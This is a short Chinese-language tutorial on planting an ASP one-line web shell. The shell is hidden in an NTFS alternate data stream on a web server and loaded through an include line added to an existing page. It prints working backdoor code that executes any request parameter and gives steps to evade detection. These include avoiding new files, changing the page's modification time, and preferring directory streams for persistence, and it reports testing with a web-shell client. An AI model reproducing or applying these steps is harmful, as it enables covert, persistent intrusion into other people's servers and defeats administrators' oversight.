利用ntfs流隐藏你的一句话木马的方法

这是利用ntfs流隐藏你的一句话小马，这方法，文件写入后，不容易给发现，隐藏性好！

如下是asp脚本的例子！
ntfs流文件的内容如下

<%
re= request("test")
if re <>"" then
  execute re
  response.end '表示结束，不再处理别的代码
end if
%>

把内容写入如下位置(示例位置)
h:\web\动易\inc:1.jpg

看清楚，是 :1.jpg 不是 \1.jpg
文件写入后，h:\web\动易\inc 目录里是看不到文件的！

现在要引导这个一句话文件！格式: <!--#include file="目录:1.jpg"-->

我随便选一个文件(最好不要自己新建文件，别人容易发现有新文件)
h:\web\动易\announce.asp

添加 
<!--#include file="inc:1.jpg"-->

修改后保存！
一句话木马隐藏基本完成！当然 h:\web\动易\announce.asp 你可以改个一下修改的时间，
这样别人就不容易发现有问题！

还有说一下，2003的流，是可以写入文件也可以写入目录的！你想把一句话马写在目录里也成，文件里也成
但建议保存到目录里，因为文件如果修改，流数据将会清空，但目录不会！

用菜刀测试成功！